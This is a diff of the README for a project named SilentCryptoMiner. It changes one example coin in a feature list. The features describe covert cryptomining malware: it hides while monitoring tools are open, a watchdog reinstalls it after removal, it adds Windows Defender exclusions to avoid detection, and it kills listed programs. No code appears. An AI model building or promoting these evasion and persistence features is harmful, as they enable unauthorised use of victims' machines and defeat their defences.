UnamSanctam/SilentCryptoMiner/README.md

 * Idle Mining - Can be configured to mine at different CPU and GPU usages or not at all while computer is or isn't in use
 * Stealth - Pauses the miner and clears the GPU memory and RAM while any of the programs in the "Stealth Targets" option are open
 * Watchdog - Monitors the miner file, miner processes and startup entry and restores the miner if anything is removed or killed
-* Multiple Miners - Can create multiple miners to run at the same time, for example one XMR (CPU) miner and one ETH (GPU) miner
+* Multiple Miners - Can create multiple miners to run at the same time, for example one XMR (CPU) miner and one RVN (GPU) miner
 * CPU & GPU Mining - Can mine on Both CPU and GPU (Nvidia & AMD)
 * Windows Defender Exclusions - Can add exclusions into Windows Defender after being started to avoid being detected
 * Process Killer - Constantly checks for any programs in the "Kill Targets" list and kills them if found